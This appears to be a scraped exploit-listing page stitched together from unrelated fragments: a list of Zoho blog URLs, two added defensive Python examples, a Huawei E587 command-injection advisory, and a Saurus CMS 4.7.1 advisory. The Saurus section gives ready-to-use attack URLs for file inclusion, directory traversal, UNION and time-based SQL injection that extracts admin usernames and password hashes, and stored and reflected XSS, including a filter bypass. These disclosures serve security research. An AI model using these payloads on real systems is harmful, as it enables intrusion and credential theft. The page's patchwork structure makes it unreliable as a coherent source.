/announcements/blog/boxnet-integrates-zoho.html
/announcements/blog/bug-tracking.html
/announcements/blog/case-study-how-zoho-reports-helps-optimize-globos-tv-programming.html
/announcements/blog/cloudave-launches-focusing-on-business-apps-on-the-cloud.html
/announcements/blog/copy-database-html-import-intelligent-chart-creation-and-themes-support-in-zoho-db-reports.html
/announcements/blog/create-zoho-creator-web-apps-from-microsoft-access-database.html
/announcements/blog/dabble-db-customers-migration-offer-from-zoho-creator.html
/announcements/blog/demo-account-in-zoho-writer-removed.html
/announcements/blog/discontinuing-support-for-ie6-in-zoho-applications-and-browser-share-for-saas-apps-is-different.html
/announcements/blog/eating-ones-own-dog-food.html
/announcements/blog/facebook-connect.html
/announcements/blog/format-your-columns-as-you-like-in-zoho-db-reports.html
/announcements/blog/general/general/general/page/2
/announcements/blog/general/general/general/page/3
/announcements/blog/general/general/page/10
/announcements/blog/general/general/page/11
/announcements/blog/general/general/page/12
/announcements/blog/general/general/page/13

IV. CREDITS
-------------------------
These vulnerabilities have been discovered by Juan Carlos García (@secnight)

V. LEGAL NOTICES
-------------------------
The Author accepts no responsibility for any damage caused by the use or misuse of this information.
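The advisory above flags forms delivered over plain http even when they submit to an https target, because the unprotected page is where a man-in-the-middle rewrites the form action. The following is an added example, not part of the advisory or of Zoho's code: a small audit that parses a page and reports every form whose delivery is not protected by TLS, plus the reverse case of an https page posting to an http target. The sample page, hostnames and URLs are constructed for the example.

```python
"""Audit HTML forms for the insecure http -> https transition.

Added example, not from the advisory. It reports forms that an on-path
attacker could retarget because the page carrying them was served over http,
and forms on https pages that leak their fields to an http target.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class FormCollector(HTMLParser):
    """Collect the action attribute of every <form> on the page."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "form":
            attr_map = {name.lower(): (value or "") for name, value in attrs}
            # A missing or empty action means the form posts back to the page URL.
            self.actions.append(attr_map.get("action", ""))


def audit_forms(page_url, html):
    """Return a list of (resolved_form_target, finding) tuples.

    Flagged conditions:
      * the page carrying the form was fetched over http: the form target
        can be rewritten before the browser ever reaches the https endpoint
        (the issue the advisory describes);
      * an https page whose form posts to an http target: the submitted
        values travel in cleartext.
    """
    collector = FormCollector()
    collector.feed(html)
    page_scheme = urlsplit(page_url).scheme.lower()
    findings = []
    for action in collector.actions:
        target = urljoin(page_url, action)          # relative actions resolve against the page
        target_scheme = urlsplit(target).scheme.lower()
        if page_scheme != "https":
            findings.append((target, "form delivered over http; target can be rewritten by a man-in-the-middle"))
        elif target_scheme != "https":
            findings.append((target, "https page submits to an http target; form data sent in cleartext"))
    return findings


# Constructed sample (placeholder hosts): a login-style form on an http page
# that posts to https, and a search form on the same page with no action.
SAMPLE_PAGE_URL = "http://www.example.com/blog/post.html"
SAMPLE_HTML = """
<html><body>
<form method="post" action="https://accounts.example.com/login">
  <input name="user"><input name="pass" type="password">
</form>
<form method="get">
  <input name="q">
</form>
</body></html>
"""

if __name__ == "__main__":
    for target, finding in audit_forms(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print(f"{target}: {finding}")
```

Both forms on the sample page are reported, the first because the https action does not help when the page that carries it is served over http. The fix is on the server side: deliver the page itself over https and send a Strict-Transport-Security header so the browser refuses the http version on later visits; the audit is the check to run against rendered pages in CI so that regressions show up.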
13. Description : Huawei E587 3G Mobile Hotspot version 11.203.27 is prone to a command injection vulnerability in the Web UI. Successful exploitation allows unauthenticated attackers to execute arbitrary commands with root privileges.
Author : Frederic Basse
Source : Huawei E587 3G Mobile Hotspot Command Injection ≈ Packet Storm
Code :

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[CVE-2013-2612] Huawei E587 3G Mobile Hotspot Command Injection
________________________________________________________________________

Summary:

Huawei E587 3G Mobile Hotspot, version 11.203.27, is prone to a command injection vulnerability in the Web UI. Successful exploitation allows unauthenticated attackers to execute arbitrary commands with root privileges.
________________________________________________________________________

Details:

The HTTP endpoint "/api/device/time" in Web UI is vulnerable to shell command injection. This allows code execution with root privileges.
________________________________________________________________________

CVSS Version 2 Metrics:

Access Vector: Network exploitable
Access Complexity: Low
Authentication: Not required to exploit
Confidentiality Impact: Complete
Integrity Impact: Complete
Availability Impact: Complete
________________________________________________________________________

Disclosure Timeline:

2013-03-18 Vendor notified
2013-03-18 CVE-2013-2612 assigned
2013-07-15 Public advisory
________________________________________________________________________

References:

http://www.huawei.com/en/security/psirt/
________________________________________________________________________

Frédéric Basse
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQEcBAEBAgAGBQJR48qZAAoJENQ4kG3hg80AJMEH/Rdyx2zmDPzr2Ar5Nc+Fw1ih
aiby28PhIKfXhAst2SrkIp6ogtDEj+PBrgbEy2YJlyKi01z1Uf2UGukxijlQTg7H
0zYivz55vleBrr9OD/A2pxo7sZZy7eswH5jia5abRUVXYYqEVWYp5KWvzbMPO3CY
EgLYxE4uv00ojqHCl9QsD7oa+mR52Jur3QZ/IdCbJJZgmEKmwNJvJ8rb6RvTMcae
+8dWhC8bhfL3UkTW5snYZ4K/euA84LmGvcfd1PXrMAX01xXDdnPJ/JxrzSPLfb1x
6WyZO6cZpgxQqvogemXKOy2MmnNkWlkK0P9OmmDpBQBI66WnyBUxXNFxEr/HFKo=
=6yIl
-----END PGP SIGNATURE-----
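The advisory above reports that a time-setting endpoint passes client input to a shell. The code below is an added example and not the device firmware: the handler, its parameter and the `date -s` invocation are hypothetical, chosen to show the two controls that remove this class of bug. Input is matched against a strict format and parsed before use, and the command is executed as an argv list with no shell, so metacharacters in the value are never interpreted.

```python
"""Hardened handling of a client-supplied time value.

Added example, not the device firmware. Contrast with the injectable pattern
    os.system("date -s '" + user_value + "'")
where any quote or separator in user_value is interpreted by the shell.
"""
import re
import subprocess
from datetime import datetime

# The exact shape we accept; anything else (separators, quotes, ...) is rejected.
TIME_RE = re.compile(r"^\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}$")


def build_set_time_argv(user_value):
    """Validate the supplied time and return the argv to run; raise ValueError otherwise.

    The value is passed as one argv element, so even a value that passed the
    pattern could not be re-parsed as additional commands.
    """
    if not isinstance(user_value, str) or not TIME_RE.match(user_value):
        raise ValueError("time value must match YYYY-MM-DD HH:MM:SS")
    # Reject values that have the right shape but impossible fields (month 13 etc.).
    datetime.strptime(user_value, "%Y-%m-%d %H:%M:%S")
    return ["date", "-s", user_value]   # hypothetical: what the device would run


def set_device_time(user_value, runner=subprocess.run):
    """Run the validated command without a shell; `runner` is injectable for tests."""
    argv = build_set_time_argv(user_value)
    result = runner(argv, shell=False, check=False, capture_output=True, text=True)
    return result.returncode == 0


def handle_time_request(user_value):
    """Model an API handler: 400 for anything the validator rejects, else the argv it would run."""
    try:
        argv = build_set_time_argv(user_value)
    except ValueError as exc:
        return 400, str(exc)
    return 200, " ".join(argv)


if __name__ == "__main__":
    # Constructed inputs: one well-formed, one carrying a shell separator, one impossible date.
    for sample in ("2013-07-15 12:00:00", "2013-07-15 12:00:00; ls", "2013-13-01 00:00:00"):
        print(sample, "->", handle_time_request(sample))
```

Validation alone is not the control here: the argv form is what guarantees the value reaches `date` as a single argument regardless of what the validator missed, and the validator in turn keeps the device from accepting garbage that `date` would reject with an unhelpful error. Setting the system clock needs root, which is why the example only builds and reports the command in `handle_time_request` and leaves execution to `set_device_time`.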
14. Description : Saurus CMS version 4.7.1 suffers from cross site scripting, remote file inclusion, local file inclusion, information disclosure, remote SQL injection, HTTP response splitting, cross site request forgery, and directory traversal vulnerabilities.
Author : Janek Vind aka waraxe
Source : Saurus CMS 4.7.1 LFI / RFI / XSS / SQL Injection / Traversal / CSRF ≈ Packet Storm
Code :

Author: Janek Vind "waraxe"
Date: 14. July 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-106.html

Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Web publishing system combining daily content management features with site administration and development tools.

http://www.saurus.info/

Vulnerable was version 4.7.1 before 07. June 2013, older versions not tested:

http://www.saurus.info/version-history/

###############################################################################
1. Local File Inclusion in "admin/fckeditor_dialog_image.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameter "dialog"
Preconditions:
1. Logged in as Saurus CMS user
2. At least one valid file ID must be known (can be bruteforced)

Php script "admin/fckeditor_dialog_image.php" line 101:
------------------------[ source code start ]----------------------------------
$object = new Objekt(array(
    'objekt_id' => (int)$site->fdat['file_id'],
    'on_sisu' => 1,
));
..
include_once('../js/fckeditor/editor/'.$site->fdat['dialog']);
------------------------[ source code end ]------------------------------------

Test (parameter "file_id" must be valid):

http://localhost/saurus471/admin/fckeditor_dialog_image.php?file_id=10572&dialog=../../../.htaccess

Result: contents of ".htaccess" file from Saurus CMS root directory will be revealed, LFI confirmed.
###############################################################################
2. Local File Inclusion in "extensions/saurus4/captcha_image.php"
###############################################################################

Reason:
1. uninitialized variable "$captcha"
Attack vector:
1. user-supplied parameter "captcha"
Preconditions:
1. PHP setting "register_globals = on"

Php script "extensions/saurus4/captcha_image.php" line 45:
------------------------[ source code start ]----------------------------------
switch ($captcha['image_type']) {
    case 'gif':
        include_once($class_path.'lgpl/GotchaGIF.class.php');
        $img = new GotchaGIF($captcha['image_width'], $captcha['image_height']);
        break;
..
if($img->create()) {
    //apply effects
    foreach($captcha['effects'] as $effect) {
        $effect_name = $effect['name'];
        //echo $effect_name;
        include_once($class_path.'lgpl/'.$effect_name.'.class.php');
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/extensions/saurus4/captcha_image.php?
captcha[image_type]=gif&captcha[image_width]=50&captcha[image_height]=50&
captcha[effects][0][name]=../waraxe

Result:

Warning: include_once(../../classes/lgpl/../waraxe.class.php) [function.include-once]: failed to open stream: No such file or directory in C:\apache_www\saurus471\extensions\saurus4\captcha_image.php on line 73

PHP error message above confirms LFI vulnerability.

###############################################################################
3. Local File Inclusion in "admin/edit.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameter "extension_path"
Preconditions:
1. Logged in as Saurus CMS user

Php script "admin/edit.php" line 76:
------------------------[ source code start ]----------------------------------
if($site->fdat['extension_path']) {
    $actions_file = '..'.$site->fdat['extension_path'].'/actions.inc.php';
..
    if (file_exists($actions_file)){
        include_once($actions_file);
------------------------[ source code end ]------------------------------------

###############################################################################
4. Remote File Inclusion in "map.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied GET parameter "cmd"
Preconditions:
1. Windows server

Php script "map.php" line 56:
------------------------[ source code start ]----------------------------------
$tmp_cmd=explode("/",$_GET['cmd']);
..
foreach($tmp_cmd as $t){
    // if the there is a .php in the URL then don't use aliases go directly to that file
    if(preg_match('/\.php$/i', $t) && file_exists($t) && !preg_match("#^\.\./#", $t))
..
        include($t);
------------------------[ source code end ]------------------------------------

On *nix servers this code above is secure enough, but things change in case of Windows server - attacker is able to use backslashes, which leads to RFI.

Example attack using local file:

http://localhost/saurus471/map.php?cmd=..\..\..\..\test.php

Example attack using remote file:

http://localhost/saurus471/map.php?cmd=\\192.168.1.25\test.php

###############################################################################
5. Remote File Inclusion in "admin/change_config.php"
###############################################################################

Reason:
1. uninitialized variable "$class_path"
Attack vector:
1. user-supplied parameter "class_path"
Preconditions:
1. 
PHP setting "register_globals = on"

Php script "admin/change_config.php" line 25:
------------------------[ source code start ]----------------------------------
global $class_path;
..
if(!isset($class_path)) {
    $class_path = "../classes/";
}
..
include_once($class_path."port.inc.php");
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/change_config.php?class_path=http://php.net/?

###############################################################################
6. Remote File Inclusion in "admin/repair_database.php"
###############################################################################

Reason:
1. uninitialized variable "$class_path"
Attack vector:
1. user-supplied parameter "class_path"
Preconditions:
1. PHP setting "register_globals = on"

Php script "admin/repair_database.php" line 23:
------------------------[ source code start ]----------------------------------
global $class_path;
if(!isset($class_path)) {
    $class_path = "../classes/";
}
include_once($class_path."port.inc.php");
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/repair_database.php?class_path=http://php.net/?

###############################################################################
7. Remote File Inclusion in "admin/check_adminpage.php"
###############################################################################

Reason:
1. uninitialized variable "$class_path"
Attack vector:
1. user-supplied parameter "class_path"
Preconditions:
1. PHP setting "register_globals = on"

Php script "admin/check_adminpage.php" line 29:
------------------------[ source code start ]----------------------------------
if(!isset($class_path)) {
    $class_path = "../classes/";
}
include($class_path."port.inc.php");
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/check_adminpage.php?class_path=http://php.net/?

###############################################################################
8. SQL Injection in "index.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied GET parameter "pg"
Preconditions:
1. PHP setting "magic_quotes_gpc = Off"

Php script "index.php" line 303:
------------------------[ source code start ]----------------------------------
if ($CMS_SETTINGS['switch_lang_enabled'] && !$cache_data && !$_GET['lang'] && !$_GET['keel'] && (is_numeric($_GET['id']) || is_numeric($_GET['pg']))){
    $myid = $_GET['id'] ? $_GET['id'] : $_GET['pg'];
    $sql = "SELECT keel.extension FROM objekt LEFT JOIN keel ON keel.keel_id=objekt.keel WHERE objekt_id='".$myid."'";
    $sth = new SQL($sql);
    $mykeel = $sth->fetchsingle();
------------------------[ source code end ]------------------------------------

As seen above, user-submitted GET parameters "id" and "pg" are checked to be numeric before using them in SQL query. If we analyze source code more closely, then it appears to be not as secure as planned by programmer. Attacker can input GET parameter "id" with value of "0" and GET parameter "pg" with SQL injection string containing single quote. As parameter "id" is numeric, checking code will be bypassed. Next line of code tests parameter "id" and because it is zero, variable "$myid" will get value from parameter "pg". This leads to SQL Injection.

Test 1:

http://localhost/saurus471/?speed_debug=on&id=0&pg=123

Result: "Page was generated in 1.20000 seconds.", normal server response.

Test 2:

http://localhost/saurus471/?speed_debug=on&id=0&pg='+UNION+SELECT+SLEEP(5)%23

Result: "Page was generated in 6.17751 seconds.", delay observed, SQL Injection confirmed.

###############################################################################
9. SQL Injection in "classes/sapi/function.init_search_results.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameter "sites"
Preconditions: none

Php script "classes/sapi/function.init_search_results.php" line 27:
------------------------[ source code start ]----------------------------------
function smarty_function_init_search_results($params,&$smarty) {
..
    if(!isset($sites)) $sites = $site->fdat['sites'];
..
    $pre_search_explode=explode(",",strtolower(trim($sites)));
    foreach($pre_search_explode as $k=>$v){
        $pre_search_explode[$k]=trim($v);
    }
    $sql_keel = "SELECT keel_id FROM keel WHERE on_kasutusel=1 AND extension IN ('".implode("','",$pre_search_explode)."')";
..
    $sth = new SQL($sql_keel);
    while($r = $sth->fetch("ASSOC")){
        $keeled[]=$r['keel_id'];
------------------------[ source code end ]------------------------------------

As seen above, user-submitted parameter "sites" ends up used in SQL query without proper sanitization, which leads to SQL Injection vulnerability.

Test 1:

http://localhost/saurus471/index.php?op=search&speed_debug=on&sites=waraxe

Result: "Page was generated in 1.18560 seconds.", normal server response.

Test 2:

http://localhost/saurus471/index.php?op=search&speed_debug=on&sites=')UNION+SELECT+SLEEP(5)%23

Result: "Page was generated in 6.22651 seconds.", delay observed, SQL Injection confirmed.

###############################################################################
10.
SQL Injection in "admin/error_log.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameters "algus", "lopp", "err_type", "sortby" and "sort"
Preconditions:
1. logged in as Saurus CMS admin

Php script "admin/error_log.php" line 63:
------------------------[ source code start ]----------------------------------
$algus_aeg = $site->fdat['algus']? $site->fdat['algus'] : date("d.m.Y",$start_d);
$lopp_aeg = $site->fdat['lopp']? $site->fdat['lopp'] : date("d.m.Y");
..
if ($algus_aeg) {
    $where_sql[] = " error_log.time_of_error>='".$site->db->ee_MySQL($algus_aeg)." 00:00' ";
}
if ($lopp_aeg) {
    $where_sql[] = " error_log.time_of_error<='".$site->db->ee_MySQL($lopp_aeg)." 23:59' ";
}
if ($site->fdat['err_type']) {
    $where_sql[] = " error_log.err_type = '".$site->fdat['err_type']."' ";
}
..
$where_str = sizeof($where_sql)>0 ? " WHERE ".join(" AND ",$where_sql) : '';
..
$site->fdat['sortby'] = $site->fdat['sortby'] ? $site->fdat['sortby'] : 'time_of_error';
$site->fdat['sort'] = $site->fdat['sort'] ? $site->fdat['sort'] : 'DESC';
..
if($site->fdat['sortby']){
    $order = " ORDER BY ".$site->fdat['sortby']." ".$site->fdat['sort'];
}
..
$sql = $site->db->prepare("SELECT DATE_FORMAT(time_of_error,'%d.%m.%y %T') AS time_of_errorf, error_log.*");
$sql .= $from_sql;
$sql .= $where_str;
$sql .= $order;
$sql .= $pagenumbers['limit_sql'];
..
$sth = new SQL($sql);
..
while ( $log = $sth->fetch() ) {
------------------------[ source code end ]------------------------------------

Test 1:

http://localhost/saurus471/admin/error_log.php?err_type='UNION+SELECT+1,1,1,1,@@version,1,1,1,1,1,1%23
http://localhost/saurus471/admin/error_log.php?algus=aa-'UNION+SELECT+1,1,1,1,@@version,1,1,1,1,1,1%23
http://localhost/saurus471/admin/error_log.php?lopp=aa-'+AND+0+UNION+SELECT+1,1,1,1,@@version,1,1,1,1,1,1%23

Result: MySQL version info will be revealed

Test 2:

http://localhost/saurus471/admin/error_log.php?err_type='UNION+SELECT+1,1,1,1,CONCAT_WS(0x3a,username,password),1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23
http://localhost/saurus471/admin/error_log.php?algus=aa-'UNION+SELECT+1,1,1,1,CONCAT_WS(0x3a,username,password),1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23
http://localhost/saurus471/admin/error_log.php?lopp=aa-'+AND+0+UNION+SELECT+1,1,1,1,CONCAT_WS(0x3a,username,password),1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23

Result: Username and password hash of the Saurus CMS user with ID 1 will be revealed

###############################################################################
11. SQL Injection in "admin/extensions.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameters "sortby" and "sort"
Preconditions:
1. logged in as Saurus CMS admin

Php script "admin/extensions.php" line 297:
------------------------[ source code start ]----------------------------------
$site->fdat['sortby'] = $site->fdat['sortby'] ? $site->fdat['sortby'] : 'name';
$site->fdat['sort'] = $site->fdat['sort'] ? $site->fdat['sort'] : 'ASC';
..
if($site->fdat['sortby']){
    $order = " ORDER BY ".$site->fdat['sortby']." ".$site->fdat['sort'];
}
..
$sql = $site->db->prepare("SELECT DATE_FORMAT(version_date,'%d.%m.%Y') AS fversion_date, extensions.*");
$sql .= $from_sql;
$sql .= $order;
..
$sth = new SQL($sql);
..
while ( $ext = $sth->fetch() ) {
------------------------[ source code end ]------------------------------------

Test 1:

http://localhost/saurus471/admin/extensions.php?sortby=1

Result: normal server response, no additional delay.

Test 2:

http://localhost/saurus471/admin/extensions.php?sortby=SLEEP(5)%23

Result: additional delay observed, SQL Injection confirmed.

###############################################################################
12. SQL Injection in "admin/profile_data.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameters "sortby" and "sort"
Preconditions:
1. logged in as Saurus CMS admin

Php script "admin/profile_data.php" line 521:
------------------------[ source code start ]----------------------------------
if($site->fdat['sortby']){
    $order = " ORDER BY ".$site->fdat['sortby']." ".$site->fdat['sort'];
}
..
$sql .= $from_sql;
$sql .= $where;
$sql .= $order;
$sql .= $pagenumbers['limit_sql'];
$sth = new SQL($sql);
..
if($sth->rows){
..
    while($asset = $sth->fetch()){
------------------------[ source code end ]------------------------------------

###############################################################################
13. SQL Injection in "classes/user_html.inc.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameters "sortby" and "sort"
Preconditions:
1. logged in as Saurus CMS admin

Php script "classes/user_html.inc.php" line 313:
------------------------[ source code start ]----------------------------------
$order = " ORDER BY ".$site->fdat['sortby']." ".$site->fdat['sort'];
..
$sql = $site->db->prepare("SELECT users.* FROM users ");
$sql .= $join;
$sql .= $where;
$sql .= $order;
$sql .= $pagenumbers['limit_sql'];
..
$sth = new SQL($sql);
..
while($tmp = $sth->fetch()){
------------------------[ source code end ]------------------------------------

###############################################################################
14. SQL Injection in "admin/sys_sonad_loetelu.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameter "sst_id"
Preconditions:
1. logged in as Saurus CMS admin

Php script "admin/sys_sonad_loetelu.php" line 123:
------------------------[ source code start ]----------------------------------
$sst_id = ($site->fdat['sst_id'] ? $site->fdat['sst_id'] : $glossary_word_types[0]['sst_id']);
if(is_numeric($site->fdat['flt_keel'])) {
..
    $otsi = $otsi ? " (sys_sonad_kirjeldus.sona LIKE '%".$otsi."%' OR sys_sonad.sona LIKE '%".$otsi."%' OR sys_sonad.origin_sona LIKE '%".$otsi."%' OR sys_sonad.sys_sona LIKE '%".$otsi."%' OR sys_sonad_kirjeldus.sys_sona LIKE '%".$otsi."%') " : " sys_sonad.sst_id=".$sst_id;
    $where_str = $site->db->prepare(" WHERE sys_sonad.keel=? AND ".$otsi." ", $keel_id, 1 );
..
    $sql .= $where_str;
..
    $sth = new SQL($sql);
..
    while ( $mysona = $sth->fetch('ASSOC') ) {
        $words[] = $mysona;
    }
------------------------[ source code end ]------------------------------------

Test 1:

http://localhost/saurus471/admin/sys_sonad_loetelu.php?flt_keel=1&sst_id=0+UNION+SELECT+@@version,1,1,1,1,1,1,1%23

Result: MySQL version info will be revealed

Test 2:

http://localhost/saurus471/admin/sys_sonad_loetelu.php?flt_keel=1&sst_id=0+UNION+SELECT+CONCAT_WS(0x3a,username,password),1,1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23

Result: Username and password hash of the Saurus CMS user with ID 1 will be revealed

###############################################################################
15. SQL Injection in "admin/change_config.php"
###############################################################################

Reason:
1. 
insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameter "timezone"
Preconditions:
1. logged in as Saurus CMS admin

Php script "admin/change_config.php" line 153:
------------------------[ source code start ]----------------------------------
$q="update config set sisu='".$site->fdat['timezone']."' where nimi='time_zone'";
new SQL($q);
------------------------[ source code end ]------------------------------------

###############################################################################
16. Stored XSS in "admin/log.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameter "user"
Preconditions:
1. "Enable site log" enabled (it is by default)

Php script "classes/site.class.php" line 538:
------------------------[ source code start ]----------------------------------
if($this->fdat["op"] == 'login' && $this->fdat["url"] && $this->CONF['disable_form_based_login'] != "1") {
    $this->user = new User(array(
        user => $this->fdat["user"],
        pass => $this->fdat["pass"],
        "site" => &$this,
    ));
    $user_id = $this->user->user_id;
    if ($user_id) {
..
    else {
        # kirjuta logi
        new Log(array(
            'action' => 'log in',
            'component' => 'Users',
            'type' => 'NOTICE',
            'message' => "Unauthorized access to CMS: username '".$this->fdat["user"]."', IP: '".$_SERVER["REMOTE_ADDR"]."'",
        ));
------------------------[ source code end ]------------------------------------

As seen above, in case of failed login attempt site log entry will be created, containing various information, including submitted username.

Php script "admin/log.php" line 265:
------------------------[ source code start ]----------------------------------
<?php foreach ($log_records as $log_record) {
    //printr($log_record);
?>
..
<td><?=$log_record['message'];?></td>
------------------------[ source code end ]------------------------------------

We can see, that php script "admin/log.php", used by admins for sitelog view, does not implement proper encoding or escaping of output, leading to Stored XSS vulnerability. Because this specific XSS payload can be inserted by anonymous user, but target victim is admin, then it has serious security impact and can lead to site full compromise.

Possible attack scenario:
1. Stored XSS insertion,
2. admin opens log.php, XSS payload steals CSRF token,
3. CSRF attack, new admin account creation,
4. attacker logs in as new admin, game over ...

Test:

1. Issue GET request as below:

http://localhost/saurus471/admin/?op=login&url=1&user=<script>alert(123);</script>

2. Log in as Saurus CMS admin and open site log page:

http://localhost/saurus471/admin/log.php

Result: javascript alert box pops up, confirming Stored XSS vulnerability.

###############################################################################
17. Stored XSS in "admin/error_log.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Preconditions:
1. "Save PHP and MySQL errors into the database" enabled (it is by default)

Php script "classes/port.inc.php" line 150:
------------------------[ source code start ]----------------------------------
function saurusErrorHandler($errno, $errmsg, $filename, $linenum, $vars){
..
    if (!defined("SAVE_ERROR_LOG")){
        $res = @mysql_query("SELECT sisu FROM config WHERE nimi='save_error_log'");
        if ($res){
            list($tmp) = @mysql_fetch_array($res);
        }
        define("SAVE_ERROR_LOG", ($tmp ? 1:0));
    }
    if (SAVE_ERROR_LOG && !substr_count($errmsg, 'mysql_num_fields')){
        @mysql_query("INSERT INTO error_log (time_of_error, source, err_text, err_type, domain, referrer, fdat_scope, ip, remote_user) VALUES (NOW(), '".addslashes($filename." line ".$linenum)."', '".addslashes($errmsg)."', 'PHP', '".addslashes($_SERVER['HTTP_HOST'])."', '".addslashes($_SERVER['REQUEST_URI'])."', '".addslashes($serialized_fdat). "', '".$_SERVER['REMOTE_ADDR']."', '".addslashes($_SERVER['REMOTE_USER'])."')");
    }
}
}
# Redefine error handler
$old_error_handler = set_error_handler("saurusErrorHandler");
------------------------[ source code end ]------------------------------------

As seen above, new PHP error handler is defined, which writes all PHP error messages to error log in database.

Php script "admin/error_log.php" line 320:
------------------------[ source code start ]----------------------------------
<td width="60%"><?= $log['err_text'] ?></td>
------------------------[ source code end ]------------------------------------

We can see, that php script "admin/log.php", used by admins for error log view, does not implement proper encoding or escaping of output, leading to Stored XSS vulnerability. Because this specific XSS payload can be inserted by anonymous user, but target victim is admin, then it has serious security impact and can lead to site full compromise by similar scenario as described in previous case.

Test:

1. Issue GET request as below (MySQL Injection from one of the previous cases):

http://localhost/saurus471/?id=0&pg='<script>alert(123);</script>

2. Log in as Saurus CMS admin and open error log page:

http://localhost/saurus471/admin/error_log.php

Result: javascript alert box pops up, confirming Stored XSS vulnerability.

###############################################################################
18. XSS protection bypass in "classes/port.inc.php"
###############################################################################

Php script "classes/port.inc.php" line 536:
------------------------[ source code start ]----------------------------------
if(strstr($_SERVER['REQUEST_URI'], $CMS_SETTINGS['wwwroot'].'/admin/') === false && (
    detect_xss_in_saurus_params($_SERVER['QUERY_STRING']) ||
    detect_xss_in_saurus_params($_SERVER['REQUEST_URI']) ||
    detect_xss_in_string($_SERVER['PHP_SELF']) ||
    detect_xss_in_saurus_params($_POST) ||
    detect_xss_in_saurus_params($_GET))
) {
    header('Location: '.$CMS_SETTINGS['wwwroot'].'/index.php');
    exit;
}
------------------------[ source code end ]------------------------------------

We can see, that XSS detection functions are used against various input parameters and in case of positive hit redirection to home page follows. There is custom exclusion in place for administrative scripts and its implementation is not secure enough - attacker can use "$CMS_SETTINGS['wwwroot'].'/admin/'" string in URI and XSS detection will be bypassed. String for XSS detection bypass is "/saurus471/admin/" in examples below.

Test 1:

http://localhost/saurus471/kalender.php?month=<script>

Result: XSS detected, redirection follows

Test 2:

http://localhost/saurus471/kalender.php?/saurus471/admin/&month=<script>

Result: XSS not detected, no redirection

###############################################################################
19. Reflected XSS in "kalender.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. 
user-supplied parameters "form", "vorm", "form_field", "lahter" and "month"
Preconditions: none

Php script "kalender.php" line 50:
------------------------[ source code start ]----------------------------------
<script type="text/javascript">
//<!--
// Handle click of OK link
function handleOK(selected_date) {
    if (opener && !opener.closed) {
        opener.document.<?if(isset($site->fdat['form'])){echo $site->fdat['form'];} else{ echo $site->fdat['vorm'];}?>.<?if(isset($site->fdat['form_field'])){echo $site->fdat['form_field'];} else{ echo $site->fdat['lahter'];}?>.value=selected_date;
        opener.document.<?if(isset($site->fdat['form'])){echo $site->fdat['form'];} else{ echo $site->fdat['vorm'];}?>.<?if(isset($site->fdat['form_field'])){echo $site->fdat['form_field'];} else{ echo $site->fdat['lahter'];}?>.focus();
..
if($site->fdat['month']>=1&&$site->fdat['month']<=12) {
    $month = $site->fdat['month'];
..
defaultDate: new Date(<?=$year;?>, <?=$month;?> - 1, <?=$day;?>),
------------------------[ source code end ]------------------------------------

Tests:

http://localhost/saurus471/kalender.php?form=</script><script>alert(123);</script>
http://localhost/saurus471/kalender.php?vorm=</script><script>alert(123);</script>
http://localhost/saurus471/kalender.php?form_field=</script><script>alert(123);</script>
http://localhost/saurus471/kalender.php?lahter=</script><script>alert(123);</script>
http://localhost/saurus471/kalender.php?/saurus471/admin/&month=1</script><script>alert(123);</script>

Results: javascript alert boxes pop up, confirming Reflected XSS vulnerabilities.

###############################################################################
20. Reflected XSS in "editor/kalender.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameters "form", "vorm", "form_field", "lahter" and "month"
Preconditions:
1. must be logged in as user

Php script "editor/kalender.php" line 50:
------------------------[ source code start ]----------------------------------
<script type="text/javascript">
//<!--
// Handle click of OK link
function handleOK(selected_date) {
    if (opener && !opener.closed) {
        opener.document.<?if(isset($site->fdat['form'])){echo $site->fdat['form'];} else{ echo $site->fdat['vorm'];}?>.<?if(isset($site->fdat['form_field'])){echo $site->fdat['form_field'];} else{ echo $site->fdat['lahter'];}?>.value=selected_date;
        opener.document.<?if(isset($site->fdat['form'])){echo $site->fdat['form'];} else{ echo $site->fdat['vorm'];}?>.<?if(isset($site->fdat['form_field'])){echo $site->fdat['form_field'];} else{ echo $site->fdat['lahter'];}?>.focus();
..
if($site->fdat['month']>=1&&$site->fdat['month']<=12) {
    $month = $site->fdat['month'];
..
